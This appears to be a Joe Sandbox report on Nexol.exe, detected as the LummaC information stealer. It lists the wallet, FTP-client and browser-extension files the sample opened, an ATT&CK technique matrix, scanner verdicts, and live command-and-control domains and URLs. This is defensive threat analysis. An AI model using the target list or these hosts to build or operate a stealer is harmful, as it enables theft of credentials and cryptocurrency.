Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\BWETZDQDIB	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\BWETZDQDIB	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 6.2.Nexol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Nexol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Nexol.exe.38d9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2542777376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Nexol.exe	89%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer
Nexol.exe	77%	Virustotal		Browse
Nexol.exe	100%	Avira	TR/AD.Nekark.ofvvl

Source	Detection	Scanner	Label
orangemyther.live/IozZ	100%	Avira URL Cloud	malware
modelshiverd.icu/bJhnsj	100%	Avira URL Cloud	malware
http://store.steamx	0%	Avira URL Cloud	safe
astralconnec.icu/DPowko	100%	Avira URL Cloud	malware
catterjur.run/boSnzhu	100%	Avira URL Cloud	malware
fostinjec.today/LksNAz	100%	Avira URL Cloud	malware
begindecafer.world/QwdZdf	100%	Avira URL Cloud	malware
garagedrootz.top/oPsoJAN	100%	Avira URL Cloud	malware
https://community.fas	0%	Avira URL Cloud	safe
arisechairedd.shop/JnsHY	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.210.122.61	true	false	high
t.me	149.154.167.99	true	false	high
exploreth.shop	104.21.16.1	true	false	unknown
modelshiverd.icu	unknown	unknown	false	high
garagedrootz.top	unknown	unknown	false	high
fostinjec.today	unknown	unknown	false	high
catterjur.run	unknown	unknown	false	high
sterpickced.digital	unknown	unknown	false	high
arisechairedd.shop	unknown	unknown	false	high
orangemyther.live	unknown	unknown	false	high
begindecafer.world	unknown	unknown	false	high
astralconnec.icu	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
orangemyther.live/IozZ	true	Avira URL Cloud: malware	unknown
catterjur.run/boSnzhu	true	Avira URL Cloud: malware	unknown
modelshiverd.icu/bJhnsj	true	Avira URL Cloud: malware	unknown
astralconnec.icu/DPowko	true	Avira URL Cloud: malware	unknown
https://t.me/asdawfq	false		high
https://steamcommunity.com/profiles/76561199822375128	false		high
begindecafer.world/QwdZdf	true	Avira URL Cloud: malware	unknown
fostinjec.today/LksNAz	true	Avira URL Cloud: malware	unknown
garagedrootz.top/oPsoJAN	true	Avira URL Cloud: malware	unknown
arisechairedd.shop/JnsHY	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.org	Nexol.exe, 00000006.00000002.2544426651.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamloopback.host	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128E	Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199822375128/badges	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199822375128/inventory/	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lk--	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://medal.tv	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=J1-T6FXbrr0Z&a	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/=	Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steamx	Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steam.tv/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://recaptcha.net	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.9.dr	false		high
https://store.steampowered.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sketchfab.com	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128	Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	Nexol.exe, 00000006.00000002.2545525950.0000000003D2D000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544426651.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/accou	Nexol.exe, 00000006.00000002.2544616663.0000000001520000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2544754138.0000000001546000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbROVe	Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545368599.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128v%f	Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	Nexol.exe, 00000006.00000002.2544657564.000000000152F000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545637840.0000000003D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fas	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l	Nexol.exe, 00000006.00000002.2545555443.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2545555443.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.16.1	exploreth.shop	United States	13335	CLOUDFLARENETUS	false
23.210.122.61	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
23.197.127.21	unknown	United States	20940	AKAMAI-ASN1EU	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1635762
Start date and time:	2025-03-11 23:58:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Nexol.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/6@15/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 36 Number of non-executed functions: 59
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.40.67.196, 23.199.214.10, 2.16.185.191, 40.126.32.72, 4.245.163.56
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobvmssprdwus02.westus.cloudapp.azure.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
